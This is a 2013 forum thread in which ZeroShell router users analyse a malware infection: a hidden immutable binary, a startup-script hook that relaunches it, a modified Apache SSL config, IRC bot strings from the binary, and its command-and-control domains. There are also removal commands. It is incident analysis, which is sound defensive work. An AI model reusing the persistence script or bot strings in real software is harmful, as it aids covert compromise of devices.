DoS on DNS Zeroshell: Malware!

Forums Network Management ZeroShell DoS on DNS Zeroshell: Malware!

  • This topic is empty.
Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • November 6, 2013 at 3:50 pm #43775
    fsala
    Member

    Hi all,
    I found a malware on one of our ZS board, that create DoS on Zeroshell DNS with 20k connections on it.

    Full analysis on the italian board (sorry, Italian only, I’ll translate it in a while…): http://www.zeroshell.net/forum/viewtopic.php?t=4115

    November 6, 2013 at 3:59 pm #52997
    fsala
    Member

    In short:

    Issue is in a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS :!:.
    File attributes are made to hide it and make deletion harder.


    
root@zeroshell DB> ls -al
    
total 131252
    
drwxr-xr-x    4 root     root         4096 Oct 21 17:09 .
    
drwxr-xr-x   21 root     root          520 Nov  6 12:55 ..
    
-rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001
    
drwxr-xr-x    7 root     root         4096 Jul  2  2012 _DB.001
    
drwx

    
2 root     root        16384 Apr 20  2011 lost+found
    
-rw-r--r--    1 root     root     134217728 Apr 20  2011 swap-file
    

    
root@zeroshell DB> lsattr .DB.001
    
-u--ia

    
.DB.001

    To deactivate/rename it:


    
killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware

    I analyzed the activity with “strace”: there are thousands of connections to DNS with query for “zeroshell.will.mx” and “zeroshell.samhan.biz” and the binary contains code to activate IRC connection (like a lot of worms).

    Executable starts at boot, inside “Database Update” script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.


    
# SSL Security Check
    
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
    
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
    
cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
    
httpd=$(pidof httpd);kill -HUP $httpd
    
fi
    

    
# Database Update
    
Database=$(pidof .DB.001)
    
if [ -z "$Database" ]; then
    
/DB/.DB.001
    
fi
    
echo "OK"

    It changes also SSL configuration of Apache:


    
#     C100-Security-Fix-beta12
    

    
SSLOptions +StdEnvVars
    
RewriteEngine On
    
RewriteCond %{REQUEST_METHOD} GET
    
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
    
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
    
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
    
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
    
RewriteRule .* - [F]

    The binary payload contains this kind of strings (IRC connection, browser emulation…), so I’m sure it’s a malware:


    
zeroshell.will.mx
    
zeroshell.samhan.biz
    
r/usr/dict/words%s : USERID : UNIX : %s
    
http://GET /%s HTTP/1.0
    
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
    
NICK %s
    
HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
    
MODE %s -xi
    
JOIN %s :%s
    
WHO %s
    
PONG %s
    
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
    
USER %s localhost localhost

    At the moment, I don’t know what was the infection entry point, but I suspect a bug in the openSSL library or in that area…

    Hope it helps!

    Fabrizio Sala/Netdream

    December 5, 2013 at 1:34 pm #52998
    bbozo
    Member

    ZS 1 b16
    ZS 2 rc2
    almost all my routers (4 of 5) where infected

    Is there going to be some kind of patch?

    fsala thank you!!!!

    January 9, 2014 at 8:13 pm #52999
    jpJxPhOuhvqc
    Participant

    I’ve found one of my installations infected with this too.

    Can we try and narrow down what we have in common to work out the infection method.

    I am running Release 2.0.RC2 setup and running since circa. 17/02/2013

    I have (open to the world):
    -Port 80 (the web interface)
    -Port 443 (the web interface)
    -Some LAN-to-LAN (OpenVPN) connections.

    -rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001

    Yet other installations have not been infected.
    OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked) running for about a year.

    OK Installation 2 = Release 2.0.RC2 / No ports open to the world running for about 2 months

    OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world running for about a year

    Both the hosts referenced in the copy I have are the same as the OP.
    zeroshell.will.mx
    and
    zeroshell.samhan.biz
    Luckily both of these don’t resolve and given the date on the infection I presume this must be a very, very old infection that we’ve only just discovered.

    root@zeroshell DB> pstree -Gp
    
init(1)─┬─.DB.001(14049)
    
root@zeroshell DB> ps aux | grep 14049
    
root      7832  0.0  0.0  1944  244 pts/0    S    03:33   0:00 grep 14049
    
root     14049  0.0  0.2  2036  640 ?        S     2013  64:09 sleep 1800

    I slayed and reloaded the process and it spawned two of itself and instantly tries to resolve zeroshell.will.mx and zeroshell.samhan.biz.
    I forced my network to respond with an IP and the infection then tries to contact zeroshell.will.mx on port 53 using TCP using the IRC protocol:

    NICK WORO
    
USER DCRK localhost localhost :VQYJWO

    Tom – http://www.mouselike.org

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.